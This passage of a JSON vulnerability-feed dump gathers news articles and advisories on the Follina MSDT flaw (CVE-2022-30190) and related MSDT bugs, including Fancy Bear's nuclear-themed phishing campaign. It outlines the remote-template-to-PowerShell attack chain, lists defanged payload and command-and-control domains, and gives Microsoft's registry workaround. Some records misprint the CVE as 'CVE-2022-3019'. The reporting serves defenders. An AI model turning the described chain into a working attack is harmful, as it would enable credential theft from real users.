"THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "href": "https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T12:27:08", "description": "Advanced persistent threat group Fancy Bear is behind a [phishing campaign](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.\n\nThe attacks by the Russia-linked APT are tied to the war between Russia and Ukraine, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for [Follina](<https://threatpost.com/microsoft-workaround-0day-attack/179776/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)), a known Microsoft one-click flaw, according to a [blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) published this week.\n\nOn June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first [reported by Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). 
Google\u2019s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in Ukraine.\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) [also independently discovered](<https://cert.gov.ua/article/341128>) the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.\n\n## **Bear on the Loose**\n\nCERT-UA [previously identified](<https://threatpost.com/cyberwar-ukraine-military/179421/>) Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating at the behest of Russian intelligence to gather info that would be useful to the agency.\n\nIn the past Fancy Bear has been linked to attacks targeting elections [in the United States](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) and [Europe](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>), as well as [hacks against sporting and anti-doping agencies](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) related to the 2020 Olympic Games.\n\nResearchers first flagged Follina in April, but [only in May](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they\u2019re opened.\n\nThe bug is dangerous for a number of reasons\u2013not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. 
If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.\n\nMicrosoft recently patched Follina in its [June Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) release but it remains [under active exploit](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) by threat actors, including known APTs.\n\n**Threat of Nuclear Attack**\n\nFancy Bear\u2019s Follina campaign targets users with emails carrying a malicious RTF file called \u201cNuclear Terrorism A Very Real Threat\u201d in an attempt to prey on victims\u2019 fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an [article](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.\n\nThe malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268[.]frge[.]io/article[.]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.\n\nThe PowerShell loads the final payload\u2013a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. 
While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.\n\nIn other functionality, the recently seen variant is \u201calmost identical\u201d to the earlier one, \u201cwith just a few minor refactors and some additional sleep commands,\u201d they added.\n\nAs with the previous variant, the stealer\u2019s main purpose is to steal data\u2014including website credentials such as username, password and URL\u2013from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.\n\n\u201cThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data,\u201d they wrote. \u201cThe new variant uses the same method but a different domain, www.specialityllc[.]com. 
Interestingly both are located in Dubai.\u201d\n\nThe owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-23T12:21:33", "type": "threatpost", "title": "Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-23T12:21:33", "id": "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "href": "https://threatpost.com/fancy-bear-nuke-threat-lure/180056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote code execution (RCE) flaw, tracked as 
[CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, 
also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who [tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL protocol to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c**Command Prompt as Administrator**\u201d; back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201d; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. 
However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. 
Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which is common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>), tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. 
He said the workaround is \u201cnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:21:06", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. 
When the candidate has been publicized, the details for this candidate will be provided.", "cvss3": {}, "published": "2022-08-09T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-35743"], "modified": "2022-08-09T07:00:00", "id": "MS:CVE-2022-35743", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35743", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T22:21:53", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\nPlease see the [MSRC Blog Entry](<https://aka.ms/CVE-2022-30190-Guidance>) for important information about steps you can take to protect your system from this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T07:00:00", "id": "MS:CVE-2022-30190", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-24T23:29:42", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (CVE-2022-34713)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-09T00:00:00", "id": "CPAI-2022-0471", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T17:59:17", "description": "A remote code execution vulnerability exists in Microsoft Support Diagnostic Tool, also known as, \"Follina\". 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Support Diagnostic Tool Remote Code Execution (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T00:00:00", "id": "CPAI-2022-0283", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-11T18:51:48", "description": "A remote code execution vulnerability exists when Microsoft Windows MSDT is called using the URL protocol from a calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, 
"impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-34713", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-08-11T10:15:41", 
"description": "Threat Level Vulnerability Report For a detailed advisory, download the pdf file here Summary Microsoft Patch Tuesday addresses CVE-2022-34713, also known as DogWalk, as well as numerous issues affecting Microsoft Exchange Server, Microsoft Windows Support Diagnostic Tool (MSDT), Windows Print Spooler Components, and Windows Secure Boot, among other products, that lead to RCE and privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-11T08:15:28", "type": "hivepro", "title": "Microsoft tackles DogWalk zero-day vulnerability and multiple privilege escalation vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713"], "modified": "2022-08-11T08:15:28", "id": "HIVEPRO:A3588E2F7CB7E12883BF5D4F364E645F", "href": "https://www.hivepro.com/microsoft-tackles-dogwalk-zero-day-vulnerability-and-multiple-privilege-escalation-vulnerabilities/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-10T14:16:09", "description": "Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The recent incident is related to TA570, wherein the attackers exploited the Follina vulnerability (CVE-2022-30190) to compromise the Domain Controller and eventually gain access to confidential files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-04T12:38:02", "type": "hivepro", "title": "Exploitation of Follina leads to takeover of domain controller", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-11-04T12:38:02", "id": "HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "href": "https://www.hivepro.com/exploitation-of-follina-leads-to-takeover-of-domain-controller/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T22:10:09", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary The unknown threat actor employs the Woody RAT to spear-phish Russian organizations. 
The malware was distributed via archive files and later switched to Microsoft Office documents leveraging the now-patched CVE-2022-30190 vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-05T18:22:17", "type": "hivepro", "title": "Woody RAT leverages Follina to target Russia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T18:22:17", "id": "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "href": "https://www.hivepro.com/woody-rat-leverages-follina-to-target-russia/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T15:15:32", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary Microsoft has issued a patch after almost 15 days for a zero-day vulnerability identified as CVE-2022-30190 after various proofs-of-concept (POCs) indicating that it is actively exploited became public. Security researchers have also named this security flaw Follina. 
A Chinese actor group, TA413, has been observed targeting organizations in Tibet with a malicious document exploiting Follina", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T10:13:53", "type": "hivepro", "title": "Follina: A zero-day vulnerability in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:13:53", "id": "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "href": "https://www.hivepro.com/follina-new-unpatched-zero-day-vulnerability-in-microsoft-office/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-12T02:01:33", "description": "[Microsoft has published](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) fixes for 141 separate vulnerabilities in its batch of August updates, fixing a total of 118 CVEs in multiple products. This is a new monthly record if you look at the CVE count.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. 
Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that jumped out at us.\n\n## Microsoft Support Diagnostics Tool\n\n[CVE-2022-34713](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34713>): is a Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) vulnerability. This is a known to be exploited vulnerability which requires the target to open a specially crafted file. This CVE is a variant of the vulnerability publicly known as [Dogwalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>).\n\n[CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>): is another MSDT RCE vulnerability. Neither technical details nor an exploit are publicly available, but we do know that user interaction is required and the attack vector is local, so this is very likely another case where a specially crafted file needs to be opened by the victim.\n\n## Microsoft Exchange\n\n[CVE-2022-30134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30134>): is a Microsoft Exchange Information Disclosure vulnerability. This vulnerability is publicly disclosed but has not yet been detected in attacks. Affected products are Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2016 CU 23, and Microsoft Exchange Server 2019 CU 12. Users vulnerable to this issue would need to enable Extended Protection in order to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team 